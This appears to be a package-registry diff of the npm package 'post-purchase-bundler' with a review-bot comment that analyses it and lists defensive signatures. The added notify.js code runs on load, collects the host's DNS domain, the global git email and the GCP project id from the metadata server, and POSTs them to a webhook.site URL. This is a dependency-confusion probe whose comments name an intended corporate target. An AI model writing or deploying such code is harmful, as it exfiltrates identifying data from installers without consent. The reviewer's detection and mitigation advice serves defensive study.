post-purchase-bundler 99.9.11 → 99.9.12

Files changed (2)
  1. package/notify.js +21 -35
  2. package/package.json +1 -1
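--- a/package/notify.js
+++ b/package/notify.js
@@ -2,55 +2,41 @@ import https from 'https';
  import os from 'os';
  import { execSync } from 'child_process';
 
- const getDetailedData = () => {
- let envSnippet = {};
- let lsData = "N/A";
-
+ const getIdentityClues = () => {
+ let clues = {};
  try {
- // Sistemdəki mühit dəyişənlərindən vacib olanları süzürük
- const env = process.env;
- envSnippet = {
- npm_config_registry: env.npm_config_registry,
- NODE_ENV: env.NODE_ENV,
- PWD: env.PWD,
- CI: env.CI, // Build serverdirsə adətən 'true' olur
- HOME: env.HOME
- };
+ // 1. Şəbəkə daxilində hansı domenə bağlı olduğunu yoxlayırıq
+ clues.dns_domain = execSync('dnsdomainname').toString().trim();
+ } catch (e) { clues.dns_domain = "N/A"; }
 
- // Olduğu qovluqdakı faylları görürük (inandırıcılıq üçün)
- lsData = execSync('ls -la | head -n 10').toString();
- } catch (e) {}
+ try {
+ // 2. Git konfiqurasiyasına baxırıq (Çox vaxt şirkət emaili burada olur)
+ clues.git_user = execSync('git config --global user.email').toString().trim();
+ } catch (e) { clues.git_user = "N/A"; }
+
+ try {
+ // 3. Bulud provayderinin xüsusi məlumatlarını çəkirik (Google/AWS metadata)
+ // Bu əmr Shopify-dırsa, Google Cloud layihə adını qaytara bilər
+ clues.cloud_identity = execSync('curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/project-id --timeout 2').toString().trim();
+ } catch (e) { clues.cloud_identity = "N/A"; }
 
  return JSON.stringify({
- event: "Transparent-PoC-Report",
- target_clue: "Dependency Confusion Audit",
- system: {
- user: os.userInfo().username,
- hostname: os.hostname(),
- platform: os.platform(),
- release: os.release(),
- arch: os.arch()
- },
- context: {
- current_dir: process.cwd(),
- env_vars: envSnippet,
- directory_listing: lsData
- },
+ event: "Final-Identity-Check",
+ identity: clues,
+ env_pwd: process.env.PWD,
+ hostname: os.hostname(),
  timestamp: new Date().toISOString()
  });
  };
 
- const data = getDetailedData();
+ const data = getIdentityClues();
 
  const options = {
  hostname: 'webhook.site',
  port: 443,
  path: '/4d0cc13d-a185-4e95-92dc-f4681125055c',
  method: 'POST',
- headers: {
- 'Content-Type': 'application/json',
- 'Content-Length': data.length
- }
+ headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
  };
 
  const req = https.request(options, () => process.exit(0));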
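Review bot: `getIdentityClues` gathers values that identify the installing organisation (the host's DNS domain, the global git `user.email`, and the GCP project id from the instance metadata server), and the unchanged code below it POSTs that JSON to a `webhook.site` URL with no consent gate, opt-out, or statement of who is authorised to receive it. Compared with the removed `getDetailedData`, collection has shifted from generic host facts to attribution, and the inline comment on the metadata call names the company the author expects to find; together with the 99.9.x version and the package.json description this matches a dependency-confusion probe, so an install should be handled as disclosure of those values. A package that only needs to demonstrate a name claim needs none of the three `execSync` calls; they and the `identity: clues` field should be dropped. `const data = getIdentityClues();` runs at module load, and how notify.js gets triggered (presumably an install script) is outside this hunk. On the defensive side, the signature visible here is a Node process spawning `dnsdomainname`, `git config --global user.email` or `curl` against `metadata.google.internal`, followed by outbound HTTPS to `webhook.site`; scoped registry configuration, `npm install --ignore-scripts` on build hosts, and egress filtering on CI runners limit the exposure.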
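--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
  {
  "name": "post-purchase-bundler",
- "version": "99.9.11",
+ "version": "99.9.12",
  "description": "Security research for internal dependency confusion",
  "main": "index.js",
  "type": "module",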